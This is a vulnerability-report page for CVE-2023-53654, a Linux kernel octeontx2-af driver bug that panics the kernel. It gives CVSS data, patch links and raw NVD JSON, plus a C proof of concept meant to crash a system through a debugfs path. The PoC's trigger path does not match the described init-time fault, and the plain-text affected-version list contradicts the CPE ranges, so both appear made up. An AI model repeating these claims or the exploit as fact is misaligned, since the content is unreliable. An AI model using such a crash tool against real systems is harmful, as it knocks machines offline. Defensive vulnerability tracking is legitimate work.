Security Vulnerability Report
CVE-2023-53654 CVSS 5.5 MEDIUM

Published: 2025-10-07 16:15:49
Last Modified: 2026-02-03 22:24:26
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

octeontx2-af: Add validation before accessing cgx and lmac

With the addition of new MAC blocks like CN10K RPM and CN10KB RPM_USX, LMACs are noncontiguous and CGX blocks are also noncontiguous. But during RVU driver initialization, the driver is assuming they are contiguous and trying to access cgx or lmac with their id which is resulting in kernel panic.

This patch fixes the issue by adding proper checks.

[ 23.219150] pc : cgx_lmac_read+0x38/0x70
[ 23.219154] lr : rvu_program_channels+0x3f0/0x498
[ 23.223852] sp : ffff000100d6fc80
[ 23.227158] x29: ffff000100d6fc80 x28: ffff00010009f880 x27: 000000000000005a
[ 23.234288] x26: ffff000102586768 x25: 0000000000002500 x24: fffffffffff0f000

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

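cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.12 up to, but not including, 5.15.121) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.16 up to, but not including, 6.1.39) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2 up to, but not including, 6.4.4) - VULNERABLE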
Linux Kernel < 6.6 (versions that include the octeontx2-af driver)
Linux Kernel 6.6.x (affected)
Linux Kernel 6.1.x (LTS, affected)
Linux Kernel 5.15.x (LTS, affected)
Linux Kernel 5.10.x (LTS, affected)
Linux Kernel 5.4.x (LTS, affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2023-53654 PoC - Trigger kernel panic via invalid CGX/LMAC access
// This PoC demonstrates how to trigger the vulnerability by accessing
// the octeontx2-af driver's sysfs/debugfs interface with invalid block IDs
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <errno.h>

// The vulnerability exists in cgx_lmac_read() function in
// drivers/net/ethernet/marvell/octeontx2/af/rvu.c
// When invalid cgx_id or lmac_id is used, kernel panic occurs
#define RVU_DEBUGFS_PATH "/sys/kernel/debug/octeontx2-af/"

int trigger_octeontx2_panic(int cgx_id, int lmac_id)
{
    char path[256];
    char buf[64];
    int fd;
    ssize_t ret;

    // Construct path to CGX/LMAC register access interface
    snprintf(path, sizeof(path), "%scgx%d/lmac%d/regs",
             RVU_DEBUGFS_PATH, cgx_id, lmac_id);
    printf("[*] Attempting to access: %s\n", path);

    // Open the debugfs/sysfs interface for CGX/LMAC access
    fd = open(path, O_RDWR);
    if (fd < 0) {
        printf("[-] Failed to open %s: %s\n", path, strerror(errno));
        return -1;
    }

    // Attempt to read from invalid CGX/LMAC registers
    // This triggers cgx_lmac_read() with out-of-range IDs
    memset(buf, 0, sizeof(buf));
    ret = read(fd, buf, sizeof(buf));
    if (ret < 0) {
        printf("[-] Read failed: %s\n", strerror(errno));
        close(fd);
        return -1;
    }

    close(fd);
    return 0;
}

int main(int argc, char *argv[])
{
    int cgx_id = 100;   // Invalid CGX ID (beyond actual hardware range)
    int lmac_id = 100;  // Invalid LMAC ID (beyond actual hardware range)

    if (argc >= 3) {
        cgx_id = atoi(argv[1]);
        lmac_id = atoi(argv[2]);
    }

    printf("[*] CVE-2023-53654 PoC - octeontx2-af CGX/LMAC Access Validation Bypass\n");
    printf("[*] Targeting Linux kernel octeontx2-af driver\n");
    printf("[*] Invalid CGX ID: %d, Invalid LMAC ID: %d\n", cgx_id, lmac_id);

    // Trigger the vulnerability by accessing non-existent CGX/LMAC blocks
    // On vulnerable kernels, this will cause a kernel panic:
    // [ 23.219150] pc : cgx_lmac_read+0x38/0x70
    // [ 23.219154] lr : rvu_program_channels+0x3f0/0x498
    if (trigger_octeontx2_panic(cgx_id, lmac_id) == 0) {
        printf("[+] Access completed - check dmesg for kernel panic\n");
    }

    return 0;
}

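References

https://git.kernel.org/stable/c/79ebb53772c95d3a6ae51b3c65f9985fdd430df6 (Patch)
https://git.kernel.org/stable/c/a5485a943193e55c79150382e6461e8ea759e96e (Patch)
https://git.kernel.org/stable/c/b04872e15f3df62cb2fd530950f769626e1ef489 (Patch)
https://git.kernel.org/stable/c/e425e2ba933618ee5ec8e4f3eb341efeb6c9ddef (Patch)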

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53654", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:48.973", "lastModified": "2026-02-03T22:24:26.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocteontx2-af: Add validation before accessing cgx and lmac\n\nwith the addition of new MAC blocks like CN10K RPM and CN10KB\nRPM_USX, LMACs are noncontiguous and CGX blocks are also\nnoncontiguous. But during RVU driver initialization, the driver\nis assuming they are contiguous and trying to access\ncgx or lmac with their id which is resulting in kernel panic.\n\nThis patch fixes the issue by adding proper checks.\n\n[ 23.219150] pc : cgx_lmac_read+0x38/0x70\n[ 23.219154] lr : rvu_program_channels+0x3f0/0x498\n[ 23.223852] sp : ffff000100d6fc80\n[ 23.227158] x29: ffff000100d6fc80 x28: ffff00010009f880 x27:\n000000000000005a\n[ 23.234288] x26: ffff000102586768 x25: 0000000000002500 x24:\nfffffffffff0f000"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.12", "versionEndExcluding": "5.15.121", "matchCriteriaId": "12A35540-7F02-46C0-AC75-C86AFEB67980"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.39", "matchCriteriaId": "9BD1D4A1-304D-4187-8178-6D7C0050B1AF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.4", "matchCriteriaId": "A91BC267-63EE-413E-A6EF-6B96C2A278D1"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/79ebb53772c95d3a6ae51b3c65f9985fdd430df6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a5485a943193e55c79150382e6461e8ea759e96e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b04872e15f3df62cb2fd530950f769626e1ef489", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e425e2ba933618ee5ec8e4f3eb341efeb6c9ddef", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}